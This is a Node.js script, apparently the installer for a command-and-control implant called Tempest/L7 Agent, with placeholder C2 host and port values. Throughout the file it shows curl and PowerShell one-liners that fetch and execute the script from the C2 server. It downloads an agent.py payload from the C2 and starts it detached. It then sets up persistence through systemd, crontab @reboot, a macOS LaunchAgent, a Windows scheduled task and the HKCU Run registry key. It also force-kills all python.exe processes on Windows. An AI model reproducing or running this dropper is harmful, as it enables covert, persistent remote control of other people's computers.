#!/usr/bin/env node
/**
 * Tempest 1.0 — Universal Agent Installer
 * Runs on Windows, macOS, Linux — requires only Node.js
 * Generated by C2: __C2_HOST__:__C2_PORT__
 *
 * Usage (any platform with Node.js):
 *   node install.js
 *
 * Or inline (Linux/macOS):
 *   node -e "$(curl -s 'http://__C2_HOST__:__C2_PORT__/install.js?host=__C2_HOST__&port=__C2_PORT__')"
 *
 * Or inline (Windows PowerShell):
 *   node -e (iwr 'http://__C2_HOST__:__C2_PORT__/install.js?host=__C2_HOST__&port=__C2_PORT__').Content
 */

const os      = require('os');
const fs      = require('fs');
const path    = require('path');
const https   = require('https');
const http    = require('http');
const { execSync, spawn } = require('child_process');

const C2_HOST  = '__C2_HOST__';
const C2_PORT  = '__C2_PORT__';
const C2_BASE  = `http://${C2_HOST}:${C2_PORT}`;
const PLATFORM = process.platform; // 'win32' | 'darwin' | 'linux'
const AGENT_DIR  = path.join(os.homedir(), '.l7agent');
const AGENT_FILE = path.join(AGENT_DIR, 'agent.py');
const LOG_FILE   = path.join(AGENT_DIR, 'agent.log');

const log  = (msg) => console.log(`[+] ${msg}`);
const warn = (msg) => console.log(`[!] ${msg}`);
const info = (msg) => console.log(`[*] ${msg}`);

// ── Helpers ────────────────────────────────────────────────────────────────
function run(cmd, opts = {}) {
    try {
        return execSync(cmd, { stdio: opts.silent ? 'pipe' : 'inherit', shell: true });
    } catch (e) {
        if (opts.throw) throw e;
        return null;
    }
}

function hasCmd(cmd) {
    try { execSync(`${PLATFORM === 'win32' ? 'where' : 'which'} ${cmd}`, { stdio: 'pipe' }); return true; }
    catch { return false; }
}

function download(url, dest) {
    return new Promise((resolve, reject) => {
        info(`Downloading ${url}`);
        const proto = url.startsWith('https') ? https : http;
        const file  = fs.createWriteStream(dest);
        proto.get(url, res => {
            if (res.statusCode === 301 || res.statusCode === 302) {
                file.close();
                return download(res.headers.location, dest).then(resolve).catch(reject);
            }
            res.pipe(file);
            file.on('finish', () => { file.close(); resolve(); });
        }).on('error', reject);
    });
}

// ── Create agent dir ───────────────────────────────────────────────────────
if (!fs.existsSync(AGENT_DIR)) fs.mkdirSync(AGENT_DIR, { recursive: true });
info(`Agent dir: ${AGENT_DIR}`);

// ── Detect Python ──────────────────────────────────────────────────────────
function findPython() {
    const candidates = PLATFORM === 'win32'
        ? ['python', 'python3', 'py']
        : ['python3', 'python', 'python3.12', 'python3.11', 'python3.10', 'python3.9'];
    for (const c of candidates) {
        if (!hasCmd(c)) continue;
        try {
            const ver = execSync(`${c} -c "import sys; print(sys.version_info[0])"`, { stdio: 'pipe' }).toString().trim();
            if (parseInt(ver) >= 3) return c;
        } catch {}
    }
    return null;
}

async function installPython() {
    warn('Python 3 not found — attempting install...');
    if (PLATFORM === 'linux') {
        if (hasCmd('apt-get'))  { run('apt-get update -qq && apt-get install -y python3'); return 'python3'; }
        if (hasCmd('dnf'))      { run('dnf install -y python3'); return 'python3'; }
        if (hasCmd('yum'))      { run('yum install -y python3'); return 'python3'; }
        if (hasCmd('pacman'))   { run('pacman -Sy --noconfirm python'); return 'python3'; }
        if (hasCmd('apk'))      { run('apk add --no-cache python3'); return 'python3'; }
    } else if (PLATFORM === 'darwin') {
        if (hasCmd('brew'))     { run('brew install python3'); return 'python3'; }
        warn('Install Homebrew first: https://brew.sh — then re-run');
        process.exit(1);
    } else if (PLATFORM === 'win32') {
        if (hasCmd('winget')) {
            run('winget install --id Python.Python.3.11 --silent --accept-source-agreements --accept-package-agreements');
        } else {
            // Download Python installer
            const installer = path.join(os.tmpdir(), 'python_installer.exe');
            await download('https://www.python.org/ftp/python/3.11.9/python-3.11.9-amd64.exe', installer);
            run(`"${installer}" /quiet InstallAllUsers=0 PrependPath=1`);
        }
        return 'python';
    }
    warn('Cannot auto-install Python. Please install manually: https://python.org');
    process.exit(1);
}

// ── Persist ────────────────────────────────────────────────────────────────
function persistLinux(py) {
    // Try systemd first (requires root)
    if (hasCmd('systemctl') && process.getuid && process.getuid() === 0) {
        const svc = `[Unit]\nDescription=Tempest Agent\nAfter=network.target\n\n[Service]\nExecStart=${py} ${AGENT_FILE}\nRestart=always\nRestartSec=10\nStandardOutput=append:${LOG_FILE}\nStandardError=append:${LOG_FILE}\n\n[Install]\nWantedBy=multi-user.target\n`;
        const svcPath = '/etc/systemd/system/l7agent.service';
        try {
            fs.writeFileSync(svcPath, svc);
            run(`systemctl daemon-reload && systemctl enable l7agent && systemctl start l7agent`);
            log('Installed as systemd service (l7agent) — starts on boot');
            return;
        } catch (e) {
            warn('systemd install failed: ' + e.message);
        }
    } else if (hasCmd('systemctl') && process.getuid && process.getuid() !== 0) {
        warn('Not root — skipping systemd, falling back to crontab');
        warn('To install as a systemd service (survives reboots), run:');
        console.log(`  sudo node -e "$(curl -s '${C2_BASE}/install.js?host=${C2_HOST}&port=${C2_PORT}')"`);
    }
    // Cron fallback (works without root)
    try {
        let existing = '';
        try { existing = execSync('crontab -l 2>/dev/null', { stdio: 'pipe' }).toString(); } catch {}
        // Remove any old l7agent entries then add fresh one
        const cleaned = existing.split('\n').filter(l => !l.includes('l7agent') && l.trim()).join('\n');
        const entry   = `${cleaned}\n@reboot ${py} ${AGENT_FILE} >> ${LOG_FILE} 2>&1\n`;
        const tmp     = path.join(os.tmpdir(), 'l7cron');
        fs.writeFileSync(tmp, entry);
        execSync(`crontab ${tmp}`, { stdio: 'pipe' });
        log('Persistence set via crontab @reboot');
        // Ensure cron daemon is running (Kali often has it disabled by default)
        try {
            execSync('systemctl is-active --quiet cron 2>/dev/null || systemctl start cron 2>/dev/null || service cron start 2>/dev/null || true', { stdio: 'pipe', shell: true });
        } catch {}
        // Verify it's in crontab
        try {
            const check = execSync('crontab -l 2>/dev/null', { stdio: 'pipe' }).toString();
            if (check.includes('l7agent')) {
                log('Crontab entry verified ✓');
            }
        } catch {}
    } catch (e) {
        warn('Could not set crontab persistence: ' + e.message);
        warn('To persist manually, run:');
        console.log(`  (crontab -l 2>/dev/null; echo "@reboot ${py} ${AGENT_FILE} >> ${LOG_FILE} 2>&1") | crontab -`);
    }
}

function persistMac(py) {
    // LaunchAgent plist
    const plistDir  = path.join(os.homedir(), 'Library', 'LaunchAgents');
    const plistPath = path.join(plistDir, 'com.l7agent.plist');
    try {
        if (!fs.existsSync(plistDir)) fs.mkdirSync(plistDir, { recursive: true });
        const plist = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.l7agent</string>
  <key>ProgramArguments</key><array><string>${py}</string><string>${AGENT_FILE}</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
  <key>StandardOutPath</key><string>${LOG_FILE}</string>
  <key>StandardErrorPath</key><string>${LOG_FILE}</string>
</dict></plist>`;
        fs.writeFileSync(plistPath, plist);
        run(`launchctl load ${plistPath}`);
        log('Installed as LaunchAgent (com.l7agent)');
    } catch {
        // Cron fallback
        try {
            const existing = execSync('crontab -l 2>/dev/null', { stdio: 'pipe' }).toString();
            const cleaned  = existing.split('\n').filter(l => !l.includes('l7agent')).join('\n');
            fs.writeFileSync(path.join(os.tmpdir(), 'l7cron'), `${cleaned}\n@reboot ${py} ${AGENT_FILE} >> ${LOG_FILE} 2>&1\n`);
            run(`crontab ${path.join(os.tmpdir(), 'l7cron')}`);
            log('Added to crontab (@reboot)');
        } catch {}
    }
}

function persistWindows(py) {
    // Task Scheduler
    const action = `"${py}" "${AGENT_FILE}"`;
    const result = run(
        `schtasks /create /tn "L7Agent" /tr ${action} /sc onlogon /rl highest /f`,
        { silent: true }
    );
    if (result !== null) {
        log('Scheduled Task "L7Agent" registered (runs at logon)');
        return;
    }
    // Registry fallback
    try {
        run(`reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v L7Agent /t REG_SZ /d "${action}" /f`);
        log('Added to HKCU Run registry key');
    } catch { warn('Could not set persistence'); }
}

// ── Main ───────────────────────────────────────────────────────────────────
(async () => {
    info(`L7 Agent Installer  |  C2: ${C2_BASE}  |  Platform: ${PLATFORM}`);

    // Find/install Python
    let py = findPython();
    if (!py) py = await installPython();
    log(`Using Python: ${py}`);

    // Kill any existing agent processes before installing (aggressive)
    info('Stopping any existing agent processes...');
    try {
        if (PLATFORM === 'win32') {
            run('taskkill /F /FI "IMAGENAME eq python.exe" 2>nul || true', { silent: true });
        } else {
            // SIGKILL all agent.py processes regardless of path
            run('kill -9 $(pgrep -f "agent.py") 2>/dev/null || true', { silent: true, shell: true });
            // Also free port 9100 if held by old agent
            run('fuser -k 9100/tcp 2>/dev/null || true', { silent: true, shell: true });
            // Wait for processes to die
            run('sleep 2', { silent: true });
        }
    } catch {}

    // Download fresh agent.py (but KEEP existing .agent_id so identity is preserved)
    const ID_FILE = path.join(AGENT_DIR, '.agent_id');
    const existingId = fs.existsSync(ID_FILE) ? fs.readFileSync(ID_FILE, 'utf8').trim() : null;
    if (existingId) {
        log(`Preserving existing agent ID: ${existingId}`);
    }

    await download(`${C2_BASE}/api/agent/generate?host=${C2_HOST}&port=${C2_PORT}`, AGENT_FILE);
    log(`Agent saved to ${AGENT_FILE}`);

    // Restore agent ID if it existed (download overwrites agent.py but not .agent_id)
    // .agent_id is a separate file so it's already preserved — just confirm
    if (existingId && fs.existsSync(ID_FILE)) {
        log(`Agent ID preserved: ${existingId}`);
    }

    // Write PID file path into a known location for deduplication
    const PID_FILE = path.join(AGENT_DIR, 'agent.pid');

    // Check if agent is already running via PID file
    if (fs.existsSync(PID_FILE)) {
        const oldPid = fs.readFileSync(PID_FILE, 'utf8').trim();
        try {
            process.kill(parseInt(oldPid), 0); // check if PID exists
            warn(`Agent already running (PID ${oldPid}) — killing it first`);
            process.kill(parseInt(oldPid), 'SIGTERM');
            await new Promise(r => setTimeout(r, 1000));
        } catch {} // PID not found — stale file
    }

    // Start immediately
    info('Starting agent...');
    const logStream = fs.openSync(LOG_FILE, 'a');
    const child = spawn(py, [AGENT_FILE], {
        detached: true, stdio: ['ignore', logStream, logStream]
    });
    child.unref();
    // Write PID file
    try { fs.writeFileSync(PID_FILE, String(child.pid)); } catch {}
    log(`Agent started (PID ${child.pid})`);

    // Persist
    info('Setting up persistence...');
    if (PLATFORM === 'linux')  persistLinux(py);
    if (PLATFORM === 'darwin') persistMac(py);
    if (PLATFORM === 'win32')  persistWindows(py);

    // ── Optional: configure Prometheus scrape ─────────────────────────────
    info('Checking for Prometheus...');
    // Comprehensive search — covers apt install, manual install, snap, homebrew, custom dirs
    const promCfgPaths = [
        '/etc/prometheus/prometheus.yml',
        '/usr/local/etc/prometheus/prometheus.yml',
        '/usr/share/prometheus/prometheus.yml',
        '/opt/prometheus/prometheus.yml',
        '/opt/prometheus/prometheus.yaml',
        '/etc/prometheus/prometheus.yaml',
        path.join(os.homedir(), 'prometheus.yml'),
        path.join(os.homedir(), 'prometheus/prometheus.yml'),
        path.join(os.homedir(), 'prometheus-2*/prometheus.yml'),   // versioned tar extract
    ];
    // Also try to find config via prometheus binary
    let promCfg = null;
    if (!promCfg) {
        try {
            const binPath = execSync('which prometheus 2>/dev/null || command -v prometheus 2>/dev/null', { stdio: 'pipe' }).toString().trim();
            if (binPath) {
                // Try common relative config locations from binary dir
                const binDir = path.dirname(binPath);
                const guesses = [
                    path.join(binDir, '..', 'etc', 'prometheus.yml'),
                    path.join(binDir, 'prometheus.yml'),
                    path.join(binDir, '..', 'prometheus.yml'),
                ];
                for (const g of guesses) {
                    try { if (fs.existsSync(path.resolve(g))) { promCfg = path.resolve(g); break; } } catch {}
                }
            }
        } catch {}
    }
    if (!promCfg) {
        // find command as last resort (fast, stops at first match)
        try {
            const found = execSync('find /etc /opt /usr /root /home -name "prometheus.yml" -o -name "prometheus.yaml" 2>/dev/null | head -1', { stdio: 'pipe', shell: true }).toString().trim();
            if (found) promCfg = found;
        } catch {}
    }
    if (!promCfg) {
        for (const p of promCfgPaths) {
            try { if (fs.existsSync(p)) { promCfg = p; break; } } catch {}
        }
    }
    if (promCfg) {
        try {
            let cfg = fs.readFileSync(promCfg, 'utf8');
            if (!cfg.includes('l7_agent')) {
                const scrapeJob = `\n  - job_name: 'l7_agent'\n    static_configs:\n      - targets: ['localhost:9100']\n`;
                cfg = cfg.replace(/\nscrape_configs:/, `\nscrape_configs:${scrapeJob}`);
                fs.writeFileSync(promCfg, cfg);
                log(`Added l7_agent scrape job to ${promCfg}`);
                // Reload Prometheus if systemctl is available
                run('systemctl reload prometheus 2>/dev/null || true', { silent: true });
                log('Prometheus reloaded — metrics at http://localhost:9100/metrics');
            } else {
                log('Prometheus scrape job already present');
            }
        } catch (e) {
            warn('Could not update Prometheus config: ' + e.message);
        }
    } else {
        info('Prometheus not found — agent exposes metrics at http://0.0.0.0:9100/metrics');
        info('If you install Prometheus later, add this scrape job to prometheus.yml:');
        console.log(`  - job_name: 'l7_agent'`);
        console.log(`    static_configs:`);
        console.log(`      - targets: ['<THIS_HOST>:9100']`);
    }

    console.log(`\n[+] Installation complete.`);
    console.log(`    Agent dir:   ${AGENT_DIR}`);
    console.log(`    Logs:        ${LOG_FILE}`);
    console.log(`    C2:          ${C2_BASE}`);
    console.log(`    Metrics:     http://0.0.0.0:9100/metrics`);
})();
